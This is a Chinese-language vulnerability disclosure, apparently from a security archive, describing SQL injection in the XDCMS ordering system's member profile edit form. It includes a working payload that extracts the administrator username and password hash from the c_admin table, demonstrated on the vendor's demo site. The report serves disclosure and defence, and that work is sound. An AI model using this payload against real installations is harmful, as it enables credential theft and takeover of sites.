XDCMS订餐系统SQL注入

### 简要描述： XDCMS订餐系统存在SQL注入，官方demo演示站利用证明，可获得管理用户名密码。 ### 详细说明： XDCMS订餐系统存在SQL注入，官方demo演示站利用证明： 没有源码，就在官方演示站证明下： 在用户更新资料处： ``` http://demo.xdcms.cn/index.php?m=member&f=edit ``` [<img src="https://images.seebug.org/upload/201311/29231847cc6ceddc78b9eb849eb1fb0544fd396d.png" alt="xd3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201311/29231847cc6ceddc78b9eb849eb1fb0544fd396d.png) 在truename，或者email，或address出插入反引号`出现保存： [<img src="https://images.seebug.org/upload/201311/29231956eb9b9d5b08d04e3d9250c36beac29a57.png" alt="xd2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201311/29231956eb9b9d5b08d04e3d9250c36beac29a57.png) 然后插入利用语句： `=(select group_concat(username,0x23,password) from c_admin where id=1)# 然后在用户名出就获得管理的用户名密码了： [<img src="https://images.seebug.org/upload/201311/29232246aef8a71954be71cfa647af836c57f057.png" alt="xd1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201311/29232246aef8a71954be71cfa647af836c57f057.png) ### 漏洞证明： ``` exp： `=(select group_concat(username,0x23,password) from c_admin where id=1)# ``` [<img src="https://images.seebug.org/upload/201311/292323232e07234b1c94e090fd0fbb21f33951a7.png" alt="xd1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201311/292323232e07234b1c94e090fd0fbb21f33951a7.png)